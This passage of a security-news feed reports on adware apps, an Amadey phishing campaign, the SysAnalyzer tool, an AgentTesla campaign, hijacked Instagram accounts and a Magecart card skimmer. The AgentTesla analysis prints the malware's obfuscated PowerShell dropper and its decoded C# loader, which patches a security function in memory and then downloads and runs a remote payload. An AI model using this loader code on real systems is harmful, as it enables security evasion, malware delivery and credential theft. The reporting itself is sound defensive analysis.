Both apps request the SYSTEM_ALERT_WINDOW permission that allows the app to overlay some information and trick the user into clicking something he did not want or typing sensitive data.

Once the apps are launched, they created a shortcut and then removed itself from the app drawer. This trick attempt to ensure persistence, even after uninstalling the shortcut, the app remains active and runs g in the background.

One of the main differences between the two apps is that SunPro Beauty Camera did not even need to be launched to push the ads, while the Funny Sweet Beauty Camera starts displaying the ads only when the app is used to download filtered photos on the device.

The experts reported the apps to Google on September 11 and the tech giant immediately removed them from Google Play.

Below recommendations published by the experts:

  • Check your app inventory for installations of these apps (Wandera customers can see this in the Security Threat View where the apps will be flagged as adware)
  • Remove instances of the apps if they have been installed
  • Always vet the security of apps, even if they are downloaded from official stores (Wandera customers can do this using App Insights)

Pierluigi Paganini

(SecurityAffairs – Android, Adware)

The post Two selfie Android adware apps with 1.5M+ downloads removed from Play Store appeared first on Security Affairs.

U.S. taxpayers hit by a phishing campaign delivering the Amadey bot

Cofense researchers spotted a phishing campaign that is targeting taxpayers in the United States to infect them with the Amadey malware.

Security experts at Cofense uncovered a phishing campaign that is targeting taxpayers in the United States attempting to infect them with a new piece of malware named Amadey.

The Amadey bot is a quite simple piece of malware that is available for hire for cybercriminals. Experts revealed that the botnet was used by the TA505 cybercrime gang to distribute the FlawedAmmy RAT and some email stealers.

“The Cofense Phishing Defense CenterTM  has detected a new wave of attacks targeting the US taxpayer by delivering Amadey botnet via phishing emails.” reads the analysis published by Cofense. “Amadey is a relatively new botnet, first noted late in Q1 of 2019. Known for its simplicity, it is available to hire for a very steep price compared to other commercially available botnets with similar functionality.”

The phishing messages used in this campaign purport to be from the Internal Revenue Service (IRS), they claim that the recipient is eligible for a tax refund.

Amadey IRS phishing

In classic social engineering attack, the phishing message presents a “one time username and password” to the victims and urges the user to click the “Login Right Here” button.

The login button is an embedded Hyperlink that points to hxxp://yosemitemanagement[.]com/fonts/page5/, a page designed to display a fake IRS login page.

Once provided the login credentials, the user will be informed of a pending refund and will be asked to download a document, print and sign it. The signed document has to be sent or uploaded to the portal. Experts discovered that when the user attempts to download the document, he will download a ZIP file that contains a highly obfuscated script dropper written in Visual Basic.

The VBScript drops an executable that downloads and executes another executable. To Amadey malware achieves persistence by setting up a registry entry using the Reg.exe command-line tool.

Once the installation process is concluded, the Amedey bot connects to one of the command and control (C&C) servers via HTTP on port 80 and sends it system diagnostic information, then it waits for further instructions.

The Amedey malware sends back to the server several data, including a unique identifier of the infected system, the malware version, operating system, antivirus software, system name, and username.

The analysis published by Cofense includes the Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post U.S. taxpayers hit by a phishing campaign delivering the Amadey bot appeared first on Security Affairs.

SysAnalyzer - Automated Malcode Analysis System

By: Unknown

SysAnalyzer is an open-source application that was designed to give malcode analysts an automated tool to quickly collect, compare, and report on the actions a binary took while running on the system.

A full installer for the application is available and can be downloaded here. The application supports windows 2000 - windows 10. Including x64 support.

The main components of SysAnalyzer work off of comparing snapshots of the system over a user-specified time interval. The reason a snapshot mechanism was used compared to a live logging implementation is to reduce the amount of data that analysts must wade through when conducting their analysis. By using a snapshot system, we can effectively present viewers with only the persistent changes found on the system since the application was first to run.

While this mechanism does help to eliminate a lot of the possible noise caused by other applications, or inconsequential runtime nuances, it also opens up the possibility for missing key data. Because of this SysAnalyzer also gives the analyst the option to include several forms of live logging into the analysis procedure.

When first run, SysAnalyzer will present the user with the following configuration wizard:

The executable path textbox represents the file under analysis. It can be filled in either by
  • Dragging and dropping the target executable on the SysAnalyzer desktop icon
  • Specifying the executable on the command line
  • Dragging and Dropping the target into the actual textbox
  • Using the browse for file button next to the textbox
For files which must open in a viewer such as DOC or PDF files, specify the viewer app in the executable textbox, and the file itself in the arguments textbox.

there are handful of options available on the screen for optional live logging components such as full packet capture, API logger, and sniff hit. you can also run it as another user.

These options are saved to a configuration file and do not need to be entered each time. Note that users can also select the "Skip" link in order to proceed to the main interface where they can manually control the snapshot tools.

note that the API logger option is generally stable but not entirely so in every case. I generally reserved this option for when I need more information than a standard analysis provides.

Once these options are filled in and the user selects the "Start button" the options will be applied, a base snapshot of the system taken, and the executable launched.

Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign

Agent Tesla is a fully customizable password info-stealer offered as malware-as-a-service, many cyber criminals are choosing it as their preferred recognition tool.  


Nowadays the Malware-As-A-Service is one of the criminal favorite ways to breach security perimeter. Agent Tesla is one of these “commodity malware”. It is a fully customizable password info-stealer and many cyber criminals are choosing it as their preferred recognition tool.  

During our monitoring operations we discovered an infection-chain designed to deliver this kind of malware to some Italian companies. The attack has been carried out impersonating personnel from the Liberian division of a global Oil Corporate. The malicious email message were spoofed, but the reference to the employee was realistic and suggests he may have conducted some preliminary OSINT.

Technical Analysis

Hash 72087f6eda897bd3deb31fa85cfbeda8eae4bad0d51a123f3e99ae8fb604a8c0
Threat Macro Dropper
Brief Description Agent Tesla Doc Macro Dropper
Ssdeep 768:nI5p+fXDk6n/lj9uJUWbnyAik8Y61g187083VCP9V9eakw6L8:8p+fzP/bgfix28ly9VZH6L8

Table 1. Static information about the doc macro

The document uses a common phishing schema, it invites the user to enable the macro execution due to compatibility reasons with older Microsoft Office versions. The document contains an obfuscated VBA macro.

Figure 1: Screen of the fake document
Figure 2: Piece of the malicious macro

Despite the variable names and the altered code flow, the macro simply decodes its hidden payload and then executes it. In fact, after a series of text replacement the document spawns another Powershell script.

  1. powershell -WindowStyle Hidden
  2. function b72f3 { param($l74b5) $l557ad = ‘bc9b4’;$l63acc = ”; for ($i = 0; $i -lt $l74b5.length; $i+=2) { $f3ed5fa = [convert]::ToByte($l74b5.Substring($i, 2), 16); $l63acc += [char]($f3ed5fa -bxor $l557ad[($i / 2) % $l557ad.length]); } return $l63acc;}
  3. $k61b35e = ‘1710500c534230401140070e0217470b0d5e42671b104d07594c314c0c400b0e5c4c7d0c175c105b12305c10420b005c110f1710500c534230401140070e17265d0304570d47160a5a110f1710500c534230401140070e172b7b59164a0b5a05436a1b471606544c7a0717026f3e12165b0e5d01435a0e55111019120d5b020a045619387d0e582b0e490d46164b1b0951100d5c0e07504115275a161140325b0b0d4d5f1625064d32460d0078065010064a11164b3e191241000f500114111758165d01435c1a40071157427d0c1769164642155856020354112b5a16334d101403050d55000056151140100a57051403510d57034b586226580e2a54125b101711405f071157075851511b4e14270d4d104d320c500c40425e1940780d025d2e5d001158104d404a6442441701550b5742104d03400b0019074c16064b0c142b0d4d324010434c06055656084a471611500c5342090d0600005610596f260f552b59120c4b161c40085c105a070f0a50164e437c0c40101a690d5d0c170440620b114d17550e334b0d4007004d401d3f434917560e0a5a424716024d0b574206411651100d19005b0d0f190f0d5b5b0b010c4a2a571664161119115204050157004e36700c4032174b425e57510a54554e434c0b5a16434b5606550215425b171719175d0c17190f0c035a0d4b0f3927550e7d0f135610404a417207460c065551064c07550e164e437c0c40101a690d5d0c17044066160f740d42072e5c0f5b101a1b4e1431064d2e5511177c10460d110404550e105c4b6942104d03400b0019074c16064b0c14140c50061408005f0006504b700c4032174b425904525b5a182b0d4d324010435d015506520c4e5d0c1719090057555b4b0f12165b0e5d01434a1655160a5a425d0c17190d0c53050f551c4b18700c4032174b425107050b5703425e19175053570c531c00540b04074a410951040757585256530209540404560c401d4b5850041c07065f5001555e042b5a16334d101a38064b0d1d190456165b420f0b57010158442b5a16334d10140000585455035e4f030054020e4a5107050b57034e010e5052514b1b500752060d030400550e520552510c5506525708520052560c01055241104b0f0b0511005703555803095f2a5716641611173851100c1019530d1756425850560c010f1f36700c4032174b425007555f51094a36700c4032174b4b015916500c4042070c0102535e09595d044b180f0d5b5b0b010c4a015a0302030215065154050a4e041a57094e5b17171906010155084b1d190456165b420f0b5701015844204d1606623f140752005552005b0419041a50084e041a055f4e041a5a091f0f2b0d4d32401043520751515a585f7903114a0a550e4d780e580d007125580d01580e1c514a022f5510105103584c2056124d4a06085b030401014e044e085c07075b0215511d59095a04565051110c511543700c4032174b4a5601020f03554c37562b5a16550d4a1d49534152045301104e5f07060a5b554e5010595850560c010e42345c00770e0a5c0c4042115d53075a5a040c5115436e0756210f50075a164b1059471611500c53421a5b0755555a04275a140a4b0d5a0f0657161a25064d245b0e075c10640317514a710c1550105b0c0e5c0c404c304907570b0255245b0e075c101a2313490e5d01024d0b5b0c275816554b481b3e681a50585a05034112000350050a4a16560009540053530e401d59115d53075a5a17265b150d550d550625500e514a010e5052514b1b525553540d060550535c565056000d070557570a565752010c5a04015609530453550d0304035258520552000c560006570a530656060c0304065658530252550c550554525b530652050d010457565d5257535308540451565f525653530c5604555709565053560c520455570a530556000e060555570f500152010c5a0404550d5250535008550455575a5203404a151b5607020e5b1d59334b0d5707104a314003114d2b5a040c190c0150005c04515f0d5c1514321156015111106a16551017700c520d4b4000510354004b0f3211560151111017314003114d4a5a57515a0752074a02105116164b0c145258441241000f500114111758165d01434a16460b0d5e425655515f511c11174b0b5a05434a53525557584b4f11174b0b5a054358040055575b570940015a5b565641021140100a5705141707085601535e6a16460b0d5e4c710f134d1b0f040c4b4a5d0c17190b095258505e4753050e56554c2f5c0c53160b020b1f5f511019561b175c424203570f03035f20560c4207114d4c600d214016514a10080403560217314100104d105d0c04110b18504a1553024b584c060556560849094a005103464b4b4f030054020e426a42025f560356010c391c0b4c0b4b14474358040055575b571a2e065705400a3e10594910064d17460c434c060556560859491f’;$k61b35e2 = b72f3($k61b35e);
  4. Add-Type -TypeDefinition $k61b35e2;[p99a3fb]::o81f67();

Code Snippet 1

The Powershell stage is substantially composed of three parts: the first is the declaration of  function “b72f3()”, having the purpose to deobfuscate the second part of the script, contained into the “$k61b35e” variable. It actually is a C# source code snippet, compiled and loaded within the Powershell process at execution time. Once loaded, the third part of the script invokes the “o81f67()” method of the just compiled “p99a3fb” class.

  1. using System;
  2. using System.Runtime.InteropServices;
  3. using System.Diagnostics;
  4. using System.IO;
  5. using System.Net;
  6. public class p99a3fb{
  7. [DllImport(“kernel32″,EntryPoint=”GetProcAddress”)]
  8. public static extern IntPtr va46a7(IntPtr af474b5,string a2457);
  9. [DllImport(“kernel32”, EntryPoint = “LoadLibrary”)] public static extern IntPtr ud1451(string j4d4b5);
  10. [DllImport(“kernel32″, EntryPoint=”VirtualProtect”)] public static extern bool m9982c8(IntPtr sfff854,UIntPtr j5236a, uint r427a, out uint m8a94);
  11. [DllImport(“Kernel32.dll”, EntryPoint=”RtlMoveMemory”, SetLastError=false)] static extern void jcfb22(IntPtr mf1b8,IntPtr dcad15,int k456b);
  12. public static int o81f67(){
  13. IntPtr eef257 = ud1451(b72f3(“030e4a0b1a060f55”));
  14. if(eef257==IntPtr.Zero){goto l255c;}
  15. IntPtr bca6aa=va46a7(eef257,b72f3(“230e4a0b67010257204104055c10”));
  16. if(bca6aa==IntPtr.Zero){goto l255c;}
  17. UIntPtr de6f3=(UIntPtr)5;
  18. uint d5c61=0;
  19. if(!m9982c8(bca6aa,de6f3,0x40,out d5c61)){goto l255c;}
  20. Byte[] e197fb8={0x31,0xff,0x90};
  21. IntPtr kee39a=Marshal.AllocHGlobal(3);
  22. Marshal.Copy(e197fb8,0,kee39a,3);
  23. jcfb22(new IntPtr(bca6aa.ToInt64()+0x001b),kee39a,3);
  24. l255c: WebClient rd1389=new WebClient();
  25. string ybea79=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+”\\x3a81a”+b72f3(“4c064107”);
  26. rd1389.DownloadFile(b72f3(“0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07”),ybea79);
  27. ProcessStartInfo n52cefe=new ProcessStartInfo(ybea79);
  28. Process.Start(n52cefe);
  29. return 0;
  30. }
  31. public static string b72f3(string s1f74a){
  32. string af474b5=”bc9b4″;
  33. string ud1451=String.Empty;
  34. for(int i=0;
  35. i<s1f74a.Length;
  36. i+=2){
  37. byte va46a7=Convert.ToByte(s1f74a.Substring(i,2),16);
  38. ud1451+=(char)(va46a7 ^ af474b5[(i/2) % af474b5.Length]);
  39. } return ud1451;
  40. }
  41. }

Code snippet 2

Code Snippet 2 is the C# class to be loaded. It has the objective to download the payload from the drop url previosly decoded by the “b72f3()” function: “hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe”

The payload is stored into “%APPDATA%\Roaming” path and it is immediately executed through the “Process.Start()” function.

The Loader

Hash 51a95607ab767b8b70479bdb86cc0a20b53eda92cd11f3abbe9eda5616a50a97
Threat Agent Tesla Loader
Brief Description Agent Tesla .NET C# loader
Ssdeep 12288:8OQeYYBAkiEK/jfG3JI0YXvL7VIUMbHdX9WBRktIx4urElCccP:8cYCdiEK/jGXqLhqNQAICurrccP

Table 2. Static information about the AgentTesla evasive loader

The dropped file payload is a .NET executable embedding some anti-analysis tricks. If it is executed on a virtual environment, the malware kills itself. It also uses some anti-debugging trick to decide if terminate its execution.

Figure 3: Method after which the process kills itself

According to the MSDN documentation, the method Delegate.CreateDelegate “creates a delegate of the specified type that represents the specified static method of the specified class, with the specified case-sensitivity and the specified behavior on failure to bind“. This way, the control flow is switched to the delegated method which actually points to a DLL containing the anti-analysis logic.

Figure 4: Loading routine of the internal DLL

Before passing the control to the “swety.dll” library, which is a sort of helper component with no particular scope except the identification of analysis environments, the first instructions executed here are designed to decode and load a byte array embedded inside the executable, unpacking the obfuscated code.

Figure 5: Decoding routine of the DLL

The Figure above shows how this payload is encoded within the byte array and the routine invoked to retrieve it. This byte array is actually a well-formed dll loaded through the “Thread.GetDomain().Load()” method. At this point, the control finally passes to the “swety.dll” library, the module in charge to detect the analysis environment.

The “Swety” Module

Hash a0c9472bc1660be648adce938d5447d38ba6d6f166d18d9e9b4ec4dd74c315c0
Threat Swety evasion module
Brief Description .NET Swety evasion module
Ssdeep 1536:fKTxXyAZ0ngmxSHOKQZfRWC/BiwGJ/827Lwv9kAdhUkIahRm48GSL/bq0g+9R26:fKpXGxxdZfE37+9pdhjTm2k/bmQ26

Table 3. Static information about the “swety” evasive module

This component is always a .NET executable. The name of the classes are self-explicative: for instance, there are clear references to Virtual Machine detection logic. 

Figure 6: Example of the enumeration of the Hypervisors

In Figure 9, the malware retrieves the information about the current hardware and compares it with a defined set of criteria, when it finds a match, it kills itself. Otherwise, the dll continues its execution and loads another PE file hidden inside the initial loader. This last executable file runs as a new thread within the initial loader context.

Figure 7: Loading of the AgentTesla final payload

The Payload 

Hash 82213cd55fee5374e407b4b98c45d7b0d291682ec0fd91b3ea47c32752b54ab9
Threat Agent Tesla
Brief Description Agent Tesla Payload
Ssdeep 6144:Ci+WZ3skyQgBYnQ7oEFjaRJ8d8ZxjD1N/a66Gq3ovDuItbP7:CbGyH5ZjaRedapNT6

Table 4. Static information about the AgentTesla payload

The extracted payload is a .NET binary file. AgentTesla and Hawkey have lots of pieces of code in common, and the analysis we made two months ago about the Hawkeye payload is similar to this one.

Figure 8: Recurrent string decryption routine through the usage of Rijndael algorithm

Also in this case every sensitive information, string or other information  is encrypted through Rijndael algorithm and it tries to evade the sandbox to the common user names of the principal sandboxes. The persistence mechanisms is practically the same and the installation path of detected during the analysis is “%APPDATA%/Roaming/SecondLORI/SecondLORI.exe” 

Figure 9: Sandbox evasion trick
Figure 10: Persistence mechanism

After its installation, the malware starts to retrieve all the credential stored within a wide list of web browsers, FTP clients, File Downloaders etc. For instance, it is able to steal accounts from:

  • Google Chrome
  • Yandex
  • Comodo Dragon
  • Cool Novo
  • Chromium
  • Torch Browser
  • 7Star
  • Amigo
  • Brave
  • Cent Browser
  • Chedot
  • Coccoc
  • Elements Browser
  • Epic Privacy
  • Kometa
  • Orbitum
  • Sputnik
  • Uran
  • Vivaldi
  • UC Browser
  • Flock Browser
  • CoreFTP
  • FileZilla
  • JDownloader
  • QQBrowser
  • Outlook
  • SeaMonkey
  • Thunderbird

The harvested credentials are then sent back to the attacker servers. The malware leverages the .NET API to easily set up a mail client to transmit the loot to a particular mailbox.

Figure 11: SMTP client account configuration

The name of the sender, “Lori”, matches the name in the persistence mechanism, “SecondLORI”. This username may belong to a previously compromised email account the attacker uses as a sort of SMTP relay to deliver the loot to the real exfiltration address, a GMail mailbox named “”. 

Figure 12: SMPT communication


As we stated in the previous post about a custom weaponization of the Hawkeye info-stealer, these kinds of malware are well known and highly used by cyber criminals. But despite their popularity event into the info-sec community, these “commodity tools” still result to be quite effective especially when combined within custom multistage infection chains, renewing their dangerousness and effectiveness.

Further technical details, including Indicators of Compromise, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB.

Pierluigi Paganini

(SecurityAffairs – AgentTesla, malware)

The post Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign appeared first on Security Affairs.

Crooks hacked other celebrity Instagram accounts to push scams

There is the same group behind the hack of the celebrity Instagram accounts, attackers used the same attack pattern to push scams.

The same threat actor continues to target celebrity Instagram accounts to push scam sites to their wide audience. Recently the Instagram account of the popular actor Robert Downey Jr. (43.3M followers) has been hacked, other victims are the singer Nicole Scherzinger (3.9; followers), and the actresses and TV stars Yanet García (11.5M followers) and Chloë Moretz.

Once the hackers have taken over the celebrity Instagram accounts have posted multiple shortened links leading to pages with surveys that were used to collect personal information.

In this way attackers could generate profits in two way, reselling the information provided by the users and earning a fee for each survey completed.

The experts observed the threat actors behind the attacks following a specific scam pattern.

“Each of the Instagram accounts were hijacked over the past couple of weeks and the attackers were in control enough to rotate multiple shortened links leading to webpages with surveys that collect personal information; this is sold for marketing purposes, typically of a darker shade.” reported BleepingComputer.

Once hacked the celebrity Instagram accounts the modify the bio to post messages saying that the celebrity was allegedly giving away 2000 iPhone XS devices and directing followers to his Story page for more offers like this.

Crooks hacked other celebrity Instagram accounts to push scams Robert Downey Jr hacked

The hackers also published a link, created with the URL shortening service, in the account bio that was pointing to a survey page likely set up to collect personal information.

The landing pages used in the attacks are hosted on the same domain, dudemobile[.]net.

In the hack of Nicole Scherzinger and Yanet García accounts, the threat actor used a more effective bait, it announced in the bio section the availability of a sex tape through an app available at a provided link.

The attackers promise to release the sex tape when the app download counter hit 5,000. The hacked account showed a fake nude image in the attempts to lure the visitor.

Security experts are warning users to secure their online accounts, using strong passwords and enabling two-factor authentication when available.

Pierluigi Paganini

(SecurityAffairs – celebrity Instagram accounts, hacking)

The post Crooks hacked other celebrity Instagram accounts to push scams appeared first on Security Affairs.

Two Widely Used Ad Blocker Extensions for Chrome Caught in Ad Fraud Scheme

Two widely used Adblocker Google Chrome extensions, posing as the original — AdBlock and uBlock Origin — extensions on Chrome Web Store, have been caught stuffing cookies in the web browser of millions of users to generate affiliate income from referral schemes fraudulently. There's no doubt web extensions add a lot of useful features to web browsers, making your online experience great and

Magecart attackers target mobile users of hotel chain booking websites

Trend Micro researchers reported that a Magecart group has hacked the websites of two hotel chains to inject scripts targeting Android and iOS users.

Researchers discovered a series of incidents involving software credit card skimmer used by Magecart to hit the booking websites of hotel chains.

In early September, the researchers discovered a JavaScript code onto two hotel websites belonging to different hotel chains. The JavaScript code was used to load a remote script on their payment page since August 9. 

“When we first checked the script’s link, it downloaded a normal JavaScript code. However, we found that the same link could also download a different script when we requested it from mobile devices like Android or iOS phones.” reads the analysis published by Trend Micro. “The downloaded script for mobile devices is a credit card skimmer which can steal the information entered on the hotel booking page and send it to a remote server.”

Experts noticed that the link would deliver a credit card skimmer script only when users visited the websites using mobile devices, suggesting that the attackers aimed at targeting only mobile users.

Trend Micro noticed that infected websites were developed by Roomleader, a firm that designs online booking websites. Threat actors injected the malicious code in the Roomleader module “viewedHotels.”

Although the module was only used for two websites of two different hotel chains, the number of potential victims is very high, as one of these brands has 107 hotels in 14 countries, while the other has 73 hotels in 14 countries.

“Despite the seemingly small number of affected sites, we still consider the attack significant given that one of the brands has 107 hotels in 14 countries while the other has 73 hotels in 14 countries. Note that we have reached out to Roomleader regarding this issue.” continues the analysis.


The code injected in the websites first checks if an HTML element containing the ID “customerBookingForm” is present on the webpage to verify that it is running on the hotel’s booking page.

If the code detects the booking page, it will check if the browser debugger is closed and then load another JavaScript from the URL hxxps://googletrackmanager[.]com/gtm[.]js that contains the card skimmer code.

The skimmer hooks the JavaScript events that are triggered when customers make a payment or submit a booking. When these events happen, the skimmer checks if the browser debugger is closed, then copies the name and value from “input” or “select” HTML elements on the booking page.

The skimmer script used in these attacks collects customers’ data, including names, email addresses, telephone numbers, hotel room preferences, and of course, credit card details.

The script encrypts data with RC4 using a hardcoded key, encoded using XOR, and then sent via HTTP POST to “https://googletrackmanager[.]com/gtm.php?id=.” The scripts appens the random string used to encode the data at the end.

The software skimmer replaces the original credit card form on the booking page, in this way attackers could require customers to submit all credit card data, including the CVC number that is not required in some booking pages. This trick also works to collect all customers data when the websites use secure iframes to load the credit card form from a different domain.

Magecart attackers created fake credit card forms in English, Spanish, Italian, French, German, Portuguese, Russian, and Dutch.

Trend Micro pointed out the network infrastructure and the scripts used in this attack could not be strongly linked to previous Magecart attacks.

“We were unable to find any strong connections to previous Magecart groups based on the network infrastructure or the malicious code used in this attack. However, it’s possible that the threat actor behind this campaign was also involved in previous campaigns.” concludes Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Magecart, hacking)

The post Magecart attackers target mobile users of hotel chain booking websites appeared first on Security Affairs.